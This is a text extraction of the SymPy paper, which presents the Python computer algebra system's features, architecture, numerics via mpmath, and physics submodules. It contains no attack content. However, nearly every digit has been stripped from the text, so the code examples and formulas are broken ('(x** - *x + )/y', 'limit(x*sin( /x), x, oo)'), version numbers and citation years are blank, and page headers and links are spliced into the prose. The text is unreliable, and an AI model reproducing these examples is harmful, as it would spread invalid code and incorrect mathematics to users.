technological university, new delhi, india université paris est créteil, créteil, france mechanical and aerospace engineering, university of california, davis, ca, united states mathematical sciences, indian institute of technology (bhu), varanasi, uttar pradesh, india department of computer science and engineering, university of moratuwa, katubedda, moratuwa, sri lanka university of illinois at urbana-champaign, urbana, il, united states california polytechnic state university, san luis obispo, ca, united states center for computing research, sandia national laboratories, albuquerque, nm, united states department of theory and bio-systems, max planck institute of colloids and interfaces, potsdam, germany indian institute of technology kharagpur, kharagpur, west bengal, india inria bordeaux-sud-ouest—lfant project-team, talence, france inria—sierra project-team, paris, france department of physics and astronomy, university of new mexico, albuquerque, nm, united states center for quantum information and control, university of new mexico, albuquerque, nm, united states sandia national laboratories, albuquerque, nm, united states fashion metric, inc, austin, tx, united states numfocus, austin, tx, united states department of surface and plasma science, faculty of mathematics and physics, charles university in prague, praha, czech republic department of computer science, department of mathematics, birla institute of technology and science, goa, india indian institute of technology bombay, mumbai, maharashtra, india new technologies—research centre, university of west bohemia, plzeň, czech republic abstract sympy is an open source computer algebra system written in pure python. it is built with a focus on extensibility and ease of use, through both interactive and programmatic applications. these characteristics have led sympy to become a popular symbolic library for the scientific python ecosystem. this paper presents the architecture of sympy, a description of its features, and a discussion of select submodules. the supplementary material provide additional examples and further outline details of the architecture and features of sympy. subjects scientific computing and simulation, software engineering keywords python, computer algebra system, symbolics how to cite this article meurer et al. ( ), sympy: symbolic computing in python. peerj comput. sci. :e ; doi . /peerj- cs. https://peerj.com mailto:asmeurer@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. this paper assumes a moderate familiarity with the python programming language. introduction sympy is a full featured computer algebra system (cas) written in the python (lutz, ) programming language. it is free and open source software, licensed under the -clause bsd license (rosen, ). the sympy project was started by ondřej Čertík in , and it has since grown to over contributors. currently, sympy is developed on github using a bazaar community model (raymond, ). the accessibility of the codebase and the open community model allow sympy to rapidly respond to the needs of users and developers. python is a dynamically typed programming language that has a focus on ease of use and readability. due in part to this focus, it has become a popular language for scientific computing and data science, with a broad ecosystem of libraries (oliphant, ). sympy is itself used as a dependency by many libraries and tools to support research within a variety of domains, such as sagemath (the sage developers, ) (pure and applied mathematics), yt (turk et al., ) (astronomy and astrophysics), pydy (gede et al., ) (multibody dynamics), and sfepy (cimrman, ) (finite elements). unlike many cas’s, sympy does not invent its own programming language. python itself is used both for the internal implementation and end user interaction. by using the operator overloading functionality of python, sympy follows the embedded domain specific language paradigm proposed by hudak ( ). the exclusive usage of a single programming language makes it easier for people already familiar with that language to use or develop sympy. simultaneously, it enables developers to focus on mathematics, rather than language design. sympy version . officially supports python . , . and . – . . sympy is designed with a strong focus on usability as a library. extensibility is important in its application program interface (api) design. thus, sympy makes no attempt to extend the python language itself. the goal is for users of sympy to be able to include sympy alongside other python libraries in their workflow, whether that be in an interactive environment or as a programmatic part in a larger system. being a library, sympy does not have a built-in graphical user interface (gui). however, sympy exposes a rich interactive display system, and supports registering display formatters with jupyter (kluyver et al., ) frontends, including the notebook and qt console, which will render sympy expressions using mathjax (cervone, ) or . the remainder of this paper discusses key components of the sympy library. section ‘overview of capabilities’ enumerates the features of sympy and takes a closer look at some of the important ones. the section ‘numerics’ looks at the numerical features of sympy and its dependency library, mpmath. section ‘physics submodule’ looks at the domain specific physics submodules for performing symbolic and numerical calculations in classical mechanics and quantum mechanics. section ‘architecture’ discusses the architecture of sympy. section ‘projects that depend on sympy’ looks at a selection of packages that depend on sympy. conclusions and future directions for sympy are given in ‘conclusion and future work’. all examples in this paper use sympy version . and mpmath version . . additionally, the supplemental information takes a deeper look at a few sympy topics. section s discusses the gruntz algorithm, which sympy uses to calculate symbolic limits. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. import * has been used here to aid the readability of the paper, but is best to avoid such wildcard import statements in production code, as they make it unclear which names are present in the namespace. furthermore, imported names could clash with already existing imports from another package. for example, sympy, the standard python math library, and numpy all define the exp function, but only the sympy one will work with sympy symbolic expressions. the three greater-than signs denote the user input for the python interactive session, with the result, if there is one, shown on the next line. sections s –s of the supplement discuss the series, logic, diophantine equations, sets, statistics, category theory, tensor, and numerical simplification submodules of sympy, respectively. section s provides additional examples for topics discussed in the main paper. section s discusses the sympy gamma project. finally, section s of the supplement contains a brief comparison of sympy with wolfram mathematica. the following statement imports all sympy functions into the global python namespace. from here on, all examples in this paper assume that this statement has been executed : >>> from sympy import * all the examples in this paper can be tested on sympy live, an online python shell that uses the google app engine (ciurana, ) to execute sympy code. sympy live is also integrated into the sympy documentation at http://docs.sympy.org. overview of capabilities this section gives a basic introduction of sympy, and lists its features. a few features— assumptions, simplification, calculus, polynomials, printers, solvers, and matrices—are core components of sympy and are discussed in depth. many other features are discussed in depth in the supplemental information . basic usage symbolic variables, called symbols, must be defined and assigned to python variables before they can be used. this is typically done through the symbols function, which may create multiple symbols in a single function call. for instance, >>> x, y, z = symbols('x y z') creates three symbols representing variables named x, y, and z. in this particular instance, these symbols are all assigned to python variables of the same name. however, the user is free to assign them to different python variables, while representing the same symbol, such as a, b, c = symbols('x y z'). in order to minimize potential confusion, though, all examples in this paper will assume that the symbols x , y , and z have been assigned to python variables identical to their symbolic names. expressions are created from symbols using python’s mathematical syntax. for instance, the following python code creates the expression (x − x+ )/y. note that the expression remains unevaluated: it is represented symbolically. >>> (x** - *x + )/y (x** - *x + )/y list of features although sympy’s extensive feature set cannot be covered in depth in this paper, bedrock areas, that is, those areas that are used throughout the library, are discussed in their own subsections below. additionally, table gives a compact listing of all major capabilities present in the sympy codebase. this grants a sampling from the breadth of topics and application domains that sympy services. unless stated otherwise, all features noted in table are symbolic in nature. numeric features are discussed in section ‘numerics.’ meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://live.sympy.org http://docs.sympy.org http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table sympy features and descriptions. feature (submodules) description calculus (sympy.core, sympy.calculus, sympy.integrals, sympy.series) algorithms for computing derivatives, integrals, and limits. category theory (sympy.categories) representation of objects, morphisms, and diagrams. tools for drawing diagrams with xy-pic (rose, ). code generation (sympy.printing, sympy.codegen) generation of compilable and executable code in a variety of different programming languages from expressions directly. target languages include c, fortran, julia, javascript, mathematica, matlab and octave, python, and theano. combinatorics & group theory (sympy.combinatorics) permutations, combinations, partitions, subsets, various permutation groups (such as polyhedral, rubik, symmetric, and others), gray codes (nijenhuis & wilf, ), and prufer sequences (biggs, lloyd & wilson, ). concrete math (sympy.concrete) summation, products, tools for determining whether summation and product expressions are convergent, absolutely convergent, hypergeometric, and for determining other properties; computation of gosper’s normal form (petkovšek, wilf & zeilberger, ) for two univariate polynomials. cryptography (sympy.crypto) block and stream ciphers, including shift, affine, substitution, vigenère’s, hill’s, bifid, rsa, kid rsa, linear-feedback shift registers, and elgamal encryption. differential geometry (sympy.diffgeom) representations of manifolds, metrics, tensor products, and coordinate systems in riemannian and pseudo-riemannian geometries (sussman & wisdom, ). geometry (sympy.geometry) representations of d geometrical entities, such as lines and circles. enables queries on these entities, such as asking the area of an ellipse, checking for collinearity of a set of points, or finding the intersection between objects. lie algebras (sympy.liealgebras) representations of lie algebras and root systems. logic (sympy.logic) boolean expressions, equivalence testing, satisfiability, and normal forms. matrices (sympy.matrices) tools for creating matrices of symbols and expressions. both sparse and dense representations, as well as symbolic linear algebraic operations (e.g., inversion and factorization), are supported. matrix expressions (sympy.matrices.expressions) matrices with symbolic dimensions (unspecified entries). block matrices. number theory (sympy.ntheory) prime number generation, primality testing, integer factorization, continued fractions, egyptian fractions, modular arithmetic, quadratic residues, partitions, binomial and multinomial coefficients, prime number tools, hexidecimal digits of π, and integer factorization. plotting (sympy.plotting) hooks for visualizing expressions via matplotlib (hunter, ) or as text drawings when lacking a graphical back- end. d function plotting, d function plotting, and d implicit function plotting are supported. (continued on next page) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) feature (submodules) description polynomials (sympy.polys) polynomial algebras over various coefficient domains. functionality ranges from simple operations (e.g., polynomial division) to advanced computations (e.g., gröbner bases (adams & loustaunau, ) and multivariate factorization over algebraic number domains). printing (sympy.printing) functions for printing sympy expressions in the terminal with ascii or unicode characters and converting sympy expressions to and mathml. quantum mechanics (sympy.physics.quantum) quantum states, bra–ket notation, operators, basis sets, representations, tensor products, inner products, outer products, commutators, anticommutators, and specific quantum system implementations. series (sympy.series) series expansion, sequences, and limits of sequences. this includes taylor, laurent, and puiseux series as well as special series, such as fourier and formal power series. sets (sympy.sets) representations of empty, finite, and infinite sets (including special sets such as the natural, integer, and complex numbers). operations on sets such as union, intersection, cartesian product, and building sets from other sets are supported. simplification (sympy.simplify) functions for manipulating and simplifying expressions. includes algorithms for simplifying hypergeometric functions, trigonometric expressions, rational functions, combinatorial functions, square root denesting, and common subexpression elimination. solvers (sympy.solvers) functions for symbolically solving equations, systems of equations, both linear and non-linear, inequalities, ordinary differential equations, partial differential equations, diophantine equations, and recurrence relations. special functions (sympy.functions) implementations of a number of well known special functions, including dirac delta, gamma, beta, gauss error functions, fresnel integrals, exponential integrals, logarithmic integrals, trigonometric integrals, bessel, hankel, airy, b-spline, riemann zeta, dirichlet eta, polylogarithm, lerch transcendent, hypergeometric, elliptic integrals, mathieu, jacobi polynomials, gegenbauer polynomial, chebyshev polynomial, legendre polynomial, hermite polynomial, laguerre polynomial, and spherical harmonic functions. statistics (sympy.stats) support for a random variable type as well as the ability to declare this variable from prebuilt distribution functions such as normal, exponential, coin, die, and other custom distributions (rocklin & terrel, ). tensors (sympy.tensor) symbolic manipulation of indexed objects. vectors (sympy.vector) basic operations on vectors and differential calculus with respect to d cartesian coordinate systems. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in sympy, √ z is defined on the usual principal branch with the branch cut along the negative real axis. sympy assumes that two expressions a and b commute with each other multiplicatively, that is, a·b=b·a, unless they both have commutative=false. many algorithms in sympy require special consideration to work correctly with noncommutative products. for historical reasons, this algorithm is distinct from the sympy.logic submodule, which is discussed in section s . sympy also has an experimental assumptions system which stores facts separate from objects, and uses sympy.logic and a sat solver for deduction. we will not discuss this system here. assumptions the assumptions system allows users to specify that symbols have certain common mathematical properties, such as being positive, imaginary, or integer. sympy is careful to never perform simplifications on an expression unless the assumptions allow them. for instance, the simplification √ t = t holds if t is nonnegative (t ≥ ), but it does not hold for a general complex t. by default, sympy performs all calculations assuming that symbols are complex valued. this assumption makes it easier to treat mathematical problems in full generality. >>> t = symbol('t') >>> sqrt(t** ) sqrt(t** ) by assuming the most general case, that t is complex by default, sympy avoids performing mathematically invalid operations. however, in many cases users will wish to simplify expressions containing terms like √ t . assumptions are set on symbol objects when they are created. for instance symbol('t', positive=true) will create a symbol named t that is assumed to be positive. >>> t = symbol('t', positive=true) >>> sqrt(t** ) t some of the common assumptions are negative, real, nonpositive, integer, prime and commutative. assumptions on any sympy object can be checked with the is_ assumption attributes, like t.is_positive . assumptions are only needed to restrict a domain so that certain simplifications can be performed. they are not required to make the domain match the input of a function. for instance, one can create the object ∑m n= f (n) as sum(f(n), (n, , m)) without setting integer=true when creating the symbol object n. the assumptions system additionally has deductive capabilities. the assumptions use a three-valued logic using the python built in objects true, false, and none. note that false is returned if the sympy object doesn’t or can’t have the assumption. for example, both i.is_real and i.is_prime return false for the imaginary unit i. none represents the ‘‘unknown’’ case. this could mean that given assumptions do not unambiguously specify the truth of an attribute. for instance, symbol('x', real=true).is_positive will give none because a real symbol might be positive or negative. none could also mean that not enough is known or implemented to compute the given fact. for instance, (pi + e).is_irrational gives none—indeed, the rationality of π+e is an open problem in mathematics (lang, ). basic implications between the facts are used to deduce assumptions. deductions are made using the rete algorithm (doorenbos, ). for instance, the assumptions system knows that being an integer implies being rational. >>> i = symbol('i', integer=true) >>> i.is_rational true meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- https://peerj.com http://dx.doi.org/ . /peerj-cs. the measure parameter of the simplify function lets the user specify the python function used to determine how complex an expression is. the default measure function returns the total number of operations in the expression. table some sympy simplification functions. expand expand the expression factor factor a polynomial into irreducibles collect collect polynomial coefficients cancel rewrite a rational function as p/q with common factors canceled apart compute the partial fraction decomposition of a rational function trigsimp simplify trigonometric expressions (fu, zhong & zeng, ) hyperexpand expand hypergeometric functions (roach, ; roach, ) furthermore, expressions compute the assumptions on themselves based on the assump- tions of their arguments. for instance, if x and y are both created with positive=true, then (x + y).is_positive will be true (whereas (x - y).is_positive will be none). simplification the generic way to simplify an expression is by calling the simplify function. it must be emphasized that simplification is not a rigorously defined mathematical operation (moses, ). the simplify function applies several simplification routines along with heuristics to make the output expression ‘‘simple’’. it is often preferable to apply more directed simplification functions. these apply very specific rules to the input expression and are typically able to make guarantees about the output. for instance, the factor function, given a polynomial with rational coefficients in several variables, is guaranteed to produce a factorization into irreducible factors. table lists common simplification functions. examples for these simplification functions can be found in section s . calculus sympy provides all the basic operations of calculus, such as calculating limits, derivatives, integrals, or summations. limits are computed with the limit function, using the gruntz algorithm (gruntz, ) for computing symbolic limits and heuristics (a description of the gruntz algorithm may be found in section s ). for example, the following computes limx→∞ xsin( x )= . note that sympy denotes ∞ as oo (two lower case ‘‘o’’s). >>> limit(x*sin( /x), x, oo) as a more complex example, sympy computes lim x→ ( e −cos(x) sin(x) − ) sinh(x) atan (x) =e. >>> limit(( *exp(( -cos(x))/sin(x))- )**(sinh(x)/atan(x)** ), x, ) e derivatives are computed with the diff function, which recursively uses the various differentiation rules. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. >>> diff(sin(x)*exp(x), x) exp(x)*sin(x) + exp(x)*cos(x) integrals are calculated with the integrate function. sympy implements a combination of the risch algorithm (bronstein, b), table lookups, a reimplementation of manuel bronstein’s ‘‘poor man’s integrator’’ (bronstein, a), and an algorithm for computing integrals based on meijer g-functions (roach, ; roach, ). these allow sympy to compute a wide variety of indefinite and definite integrals. the meijer g-function algorithm and the risch algorithm are respectively demonstrated below by the computation of∫ ∞ e−st log(t) dt =− log(s)+γ s and ∫ − x (log(x)+ )ex +(ex + ) x ( ex + ) ( log(x)+ ) dx = log(log(x)+ )+ ex + . >>> s, t = symbols('s t', positive=true) >>> integrate(exp(-s*t)*log(t), (t, , oo)).simplify() -(log(s) + eulergamma)/s >>> integrate((- *x** *(log(x) + )*exp(x** ) + ... (exp(x** ) + )** )/(x*(exp(x** ) + )** *(log(x) + )), x) log(log(x) + ) + /(exp(x** ) + ) summations are computed with the summation function, which uses a combination of gosper’s algorithm (gosper, ), an algorithm that uses meijer g-functions (roach, ; roach, ), and heuristics. products are computed with product function via a suite of heuristics. >>> i, n = symbols('i n') >>> summation( **i, (i, , n - )) **n - >>> summation(i*factorial(i), (i, , n)) n*factorial(n) + factorial(n) - series expansions are computed with the series function. this example computes the power series of sin(x) around x = up to x . >>> series(sin(x), x, , ) x - x** / + x** / + o(x** ) section s discusses series expansions methods in more depth. integrals, derivatives, summations, products, and limits that cannot be computed return unevaluated objects. these can also be created directly if the user chooses. >>> integrate(x**x, x) integral(x**x, x) >>> sum( **i, (i, , n - )) sum( **i, (i, , n - )) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. in a dense representation, the coefficients for all terms up to the degree of each variable are stored in memory. in a sparse representation, only the nonzero coefficients are stored. many python libraries distinguish the str form of an object, which is meant to be human-readable, and the repr form, which is mean to be valid python that recreates the object. in sympy, str(expr) == repr(expr). in other words, the string representation of an expression is designed to be compact, human-readable, and valid python code that could be used to recreate the expression. as noted in section ‘the core’, the srepr function prints the exact, verbose form of an expression. polynomials sympy implements a suite of algorithms for polynomial manipulation, which ranges from relatively simple algorithms for doing arithmetic of polynomials, to advanced methods for factoring multivariate polynomials into irreducibles, symbolically determining real and complex root isolation intervals, or computing gröbner bases. polynomial manipulation is useful in its own right. within sympy, though, it is mostly used indirectly as a tool in other areas of the library. in fact, many mathematical problems in symbolic computing are first expressed using entities from the symbolic core, preprocessed, and then transformed into a problem in the polynomial algebra, where generic and efficient algorithms are used to solve the problem. the solutions to the original problem are subsequently recovered from the results. this is a common scheme in symbolic integration or summation algorithms. sympy implements dense and sparse polynomial representations. both are used in the univariate and multivariate cases. the dense representation is the default for univariate polynomials. for multivariate polynomials, the choice of representation is based on the application. the most common case for the sparse representation is algorithms for computing gröbner bases (buchberger, f , and f ) (buchberger, ; faugère, ; faugère, ). this is because different monomial orderings can be expressed easily in this representation. however, algorithms for computing multivariate gcds or factorizations, at least those currently implemented in sympy (paprocki, ), are better expressed when the representation is dense. the dense multivariate representation is specifically a recursively-dense representation, where polynomials in k[x ,x ,...,xn] are viewed as a polynomials in k[x ][x ]...[xn]. note that despite this, the coefficient domain k , can be a multivariate polynomial domain as well. the dense recursive representation in python gets inefficient as the number of variables increases. some examples for the sympy.polys submodule can be found in section s . printers sympy has a rich collection of expression printers. by default, an interactive python session will render the str form of an expression, which has been used in all the examples in this paper so far. the str form of an expression is valid python and roughly matches what a user would type to enter the expression. >>> phi = symbol('phi ') >>> str(integral(sqrt(phi ), phi )) 'integral(sqrt(phi ), phi )' a two-dimensional ( d) textual representation of the expression can be printed with monospace fonts via pprint. unicode characters are used for rendering mathematical symbols such as integral signs, square roots, and parentheses. greek letters and subscripts in symbol names that have unicode code points associated are also rendered automatically. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. see section s for an in depth discussion on the diophantine submodule. alternately, the use_unicode=false flag can be set, which causes the expression to be printed using only ascii characters. >>> pprint(integral(sqrt(phi + ), phi ), use_unicode=false) / | | __________ | \/ phi + d(phi ) | / the function latex returns a representation of an expression. >>> print(latex(integral(sqrt(phi + ), phi ))) \int \sqrt{\phi_{ } + }\, d\phi_{ } users are encouraged to run the init_printing function at the beginning of interactive sessions, which automatically enables the best pretty printing supported by their environment. in the jupyter notebook or qt console (pérez & granger, ), the printer is used to render expressions using mathjax or , if it is installed on the system. the d text representation is used otherwise. other printers such as mathml are also available. sympy uses an extensible printer subsystem, which allows extending any given printer, and also allows custom objects to define their printing behavior for any printer. the code generation functionality of sympy relies on this subsystem to convert expressions into code in various target programming languages. solvers sympy has equation solvers that can handle ordinary differential equations, recurrence relationships, diophantine equations, and algebraic equations. there is also rudimentary support for simple partial differential equations. there are two functions for solving algebraic equations in sympy: solve and solveset. solveset has several design changes with respect to the older solve function. this distinction is present in order to resolve the usability issues with the previous solve function api while maintaining backward compatibility with earlier versions of sympy. solveset only requires essential input information from the user. the function signatures of solve and solveset are solve(f, *symbols, **flags) solveset(f, symbol, domain=s.complexes) the domain parameter can be any set from the sympy.sets module (see section s for details on sympy.sets), but is typically either s.complexes (the default) or s.reals; the latter causes solveset to only return real solutions. an important difference between the two functions is that the output api of solve varies with input (sometimes returning a python list and sometimes a python dictionary) whereas solveset always returns a sympy set object. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. similar to the polynomials submodule, dense here means that all entries are stored in memory, contrasted with a sparse representation where only nonzero entries are stored. both functions implicitly assume that expressions are equal to . for instance, solveset(x - , x) solves x− = for x. solveset is under active development as a planned replacement for solve. there are certain features which are implemented in solve that are not yet implemented in solveset, including multivariate systems, and some transcendental equations. some examples for solveset and solve can be found in section s . matrices besides being an important feature in its own right, computations on matrices with symbolic entries are important for many algorithms within sympy. the following code shows some basic usage of the matrix class. >>> a = matrix([[x, x + y], [y, x]]) >>> a matrix([ [x, x + y], [y, x]]) sympy matrices support common symbolic linear algebra manipulations, including matrix addition, multiplication, exponentiation, computing determinants, solving linear systems, singular values, and computing inverses using lu decomposition, ldl decomposition, gauss-jordan elimination, cholesky decomposition, moore–penrose pseudoinverse, or adjugate matrices. all operations are performed symbolically. for instance, eigenvalues are computed by generating the characteristic polynomial using the berkowitz algorithm and then finding its zeros using polynomial routines. >>> a.eigenvals() {x - sqrt(y*(x + y)): , x + sqrt(y*(x + y)): } internally these matrices store the elements as lists of lists (lil) (jones et al., ), meaning the matrix is stored as a list of lists of entries (effectively, the input format used to create the matrix a above), making it a dense representation. for storing sparse matrices, the sparsematrix class can be used. sparse matrices store their elements in dictionary of keys (dok) format, meaning that the entries are stored as a dict of (row, column) pairs mapping to the elements. sympyalsosupports matrices withsymbolicdimensionvalues. matrixsymbol represents a matrix with dimensions m×n, where m and n can be symbolic. matrix addition and multiplication, scalar operations, matrix inverse, and transpose are stored symbolically as matrix expressions. block matrices are also implemented in sympy. blockmatrix elements can be any matrix expression, including explicit matrices, matrix symbols, and other block matrices. all functionalities of matrix expressions are also present in blockmatrix . when symbolic matrices are combined with the assumptions submodule for logical inference, they provide powerful reasoning over invertibility, semi-definiteness, meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. orthogonality, etc., which are valuable in the construction of numerical linear algebra systems (rocklin, ). more examples for matrix and blockmatrix may be found in section s . numerics while sympy primarily focuses on symbolics, it is impossible to have a complete symbolic system without the ability to numerically evaluate expressions. many operations directly use numerical evaluation, such as plotting a function, or solving an equation numerically. beyond this, certain purely symbolic operations require numerical evaluation to effectively compute. for instance, determining the truth value of e+ >π is most conveniently done by numerically evaluating both sides of the inequality and checking which is larger. floating-point numbers floating-point numbers in sympy are implemented by the float class, which represents an arbitrary-precision binary floating-point number by storing its value and precision (in bits). this representation is distinct from the python built-in float type, which is a wrapper around machine double types and uses a fixed precision ( -bit). because python float literals are limited in precision, strings should be used to input precise decimal values: >>> float( . ) . >>> float( . , ) # precision equivalent to digits . >>> float(" . ", ) . the evalf method converts a constant symbolic expression to a float with the specified precision, here digits: >>> (pi + ).evalf( ) . float numbers do not track their accuracy, and should be used with caution within symbolic expressions since familiar dangers of floating-point arithmetic apply (goldberg, ). a notorious case is that of catastrophic cancellation: >>> cos(exp(- )).evalf( ) - applying the evalf method to the whole expression solves this problem. internally, evalf estimates the number of accurate bits of the floating-point approximation for each sub-expression, and adaptively increases the working precision until the estimated accuracy of the final result matches the sought number of decimal digits: >>> (cos(exp(- )) - ).evalf( ) - . e- meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. the evalf method works with complex numbers and supports more complicated expressions, such as special functions, infinite series, and integrals. the internal error tracking does not provide rigorous error bounds (in the sense of interval arithmetic) and cannot be used to accurately track uncertainty in measurement data; the sole purpose is to mitigate loss of accuracy that typically occurs when converting symbolic expressions to numerical values. the mpmath library the implementation of arbitrary-precision floating-point arithmetic is supplied by the mpmath library (johansson & the mpmath development team, ). originally, it was developed as a sympy submodule but has subsequently been moved to a standalone pure-python package. the basic datatypes in mpmath are mpf and mpc, which respectively act as multiprecision substitutes for python’s float and complex. the floating-point precision is controlled by a global context: >>> import mpmath >>> mpmath.mp.dps = # digits of precision >>> mpmath.mpf(" . ") + mpmath.exp(- ) mpf(' . ') >>> print(_) # pretty-printed . like sympy, mpmath is a pure python library. a design decision of sympy is to keep it and its required dependencies pure python. this is a primary advantage of mpmath over other multiple precision libraries such as gnu mpfr (fousse et al., ), which is faster. like sympy, mpmath is also bsd licensed (gnu mpfr is licensed under the gnu lesser general public license (rosen, )). internally, mpmath represents a floating-point number (− )sx · y by a tuple (s,x,y,b) where x and y are arbitrary-size python integers and the redundant integer b stores the bit length of x for quick access. if gmpy (horsen, ) is installed, mpmath automatically uses the gmpy.mpz type for x, and gmpy methods for rounding-related operations, improving performance. most mpmath and sympy functions use the same naming scheme, although this is not true in every case. for example, the symbolic sympy summation expression sum(f(x), (x, a, b)) representing ∑b x=a f (x) is represented in mpmath as nsum(f, (a, b)), where f is a numeric python function. the mpmath library supports special functions, root-finding, linear algebra, polynomial approximation, and numerical computation of limits, derivatives, integrals, infinite series, and solving odes. all features work in arbitrary precision and use algorithms that allow computing hundreds of digits rapidly (except in degenerate cases). the double exponential (tanh-sinh) quadrature is used for numerical integration by default. for smooth integrands, this algorithm usually converges extremely rapidly, even when the integration interval is infinite or singularities are present at the endpoints (takahasi & mori, ; bailey, jeyabalan & li, ). however, for good performance, meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. singularities in the middle of the interval must be specified by the user. to evaluate slowly converging limits and infinite series, mpmath automatically tries richardson extrapolation and the shanks transformation (euler-maclaurin summation can also be used) (bender & orszag, ). a function to evaluate oscillatory integrals by means of convergence acceleration is also available. a wide array of higher mathematical functions is implemented with full support for complex values of all parameters and arguments, including complete and incomplete gamma functions, bessel functions, orthogonal polynomials, elliptic functions and integrals, zeta and polylogarithm functions, the generalized hypergeometric function, and the meijer g-function. the meijer g-function instance g , , ( ; ,− ,− ∣∣x) is a good test case (toth, ); past versions of both maple and mathematica produced incorrect numerical values for large x > . here, mpmath automatically removes an internal singularity and compensates for cancellations (amounting to bits of precision when x = , ), giving correct values: >>> mpmath.mp.dps = >>> mpmath.meijerg([[],[ ]], [[- . ,- ,- . ],[]], ) mpf(' . e- ') equivalently, with sympy’s interface this function can be evaluated as: >>> meijerg([[],[ ]], [[-s( )/ ,- ,-s( )/ ],[]], ).evalf() . e- symbolic integration and summation often produce hypergeometric and meijer g- function closed forms (see section ‘calculus’); numerical evaluation of such special functions is a useful complement to direct numerical integration and summation. physics submodule sympy includes several submodules that allow users to solve domain specific physics problems. for example, a comprehensive physics submodule is included that is useful for solving problems in mechanics, optics, and quantum mechanics along with support for manipulating physical quantities with units. classical mechanics one of the core domains that sympy suports is the physics of classical mechanics. this is in turn separated into two distinct components: vector algebra and mechanics. vector algebra the sympy.physics.vector submodule provides reference frame-, time-, and space- aware vector and dyadic objects that allow for three-dimensional operations such as addition, subtraction, scalar multiplication, inner and outer products, and cross products. the vector and dyadic objects both can be written in very compact notation that make it easy to express the vectors and dyadics in terms of multiple reference frames with arbitrarily defined relative orientations. the vectors are used to specify the positions, velocities, and accelerations of points; orientations, angular velocities, and angular accelerations of meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reference frames; and forces and torques. the dyadics are essentially reference frame-aware × tensors (tai, ). the vector and dyadic objects can be used for any one-, two-, or three-dimensional vector algebra, and they provide a strong framework for building physics and engineering tools. the following python code demonstrates how a vector is created using the orthogonal unit vectors of three reference frames that are oriented with respect to each other, and the result of expressing the vector in the a frame. the b frame is oriented with respect to the a frame using z-x-z euler angles of magnitude π, π , and π , respectively, whereas the c frame is oriented with respect to the b frame through a simple rotation about the b frame’s x unit vector through π . >>> from sympy.physics.vector import referenceframe >>> a, b, c = symbols('a b c', cls=referenceframe) >>> b.orient(a, 'body', (pi, pi/ , pi/ ), 'zxz') >>> c.orient(b, 'axis', (pi/ , b.x)) >>> v = *a.x + *b.z + *c.y >>> v a.x + *b.z + *c.y >>> v.express(a) a.x + *sqrt( )/ *a.y + / *a.z mechanics the sympy.physics.mechanics submodule utilizes the sympy.physics.vector submodule to populate time-aware particle and rigid-body objects to fully describe the kinematics and kinetics of a rigid multi-body system. these objects store all of the information needed to derive the ordinary differential or differential algebraic equations that govern the motion of the system, i.e., the equations of motion. these equations of motion abide by newton’s laws of motion and can handle arbitrary kinematic constraints or complex loads. the submodule offers two automated methods for formulating the equations of motion based on lagrangian dynamics (lagrange, ) and kane’s method (kane & levinson, ). lastly, there are automated linearization routines for constrained dynamical systems (peterson, gede & hubbard, ). quantum mechanics the sympy.physics.quantum submodule has extensive capabilities to solve problems in quantum mechanics, using python objects to represent the different mathematical objects relevant in quantum theory (sakurai & napolitano, ): states (bras and kets), operators (unitary, hermitian, etc.), and basis sets, as well as operations on these objects such as representations, tensor products, inner products, outer products, commutators, and anticommutators. the base objects are designed in the most general way possible to enable any particular quantum system to be implemented by subclassing the base operators and defining the relevant class methods to provide system-specific logic. symbolic quantum operators and states may be defined, and one can perform a full range of operations with them. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. >>> from sympy.physics.quantum import commutator, dagger, operator >>> from sympy.physics.quantum import ket, qapply >>> a, b, c, d = symbols('a b c d', cls=operator) >>> a = ket('a') >>> comm = commutator(a, b) >>> comm [a,b] >>> qapply(dagger(comm*a)).doit() -<a|*(dagger(a)*dagger(b) - dagger(b)*dagger(a)) commutators can be expanded using common commutator identities: >>> commutator(c+b, a*d).expand(commutator=true) -[a,b]*d - [a,c]*d + a*[b,d] + a*[c,d] on top of this set of base objects, a number of specific quantum systems have been implemented in a fully symbolic framework. these include: • many of the exactly solvable quantum systems, including simple harmonic 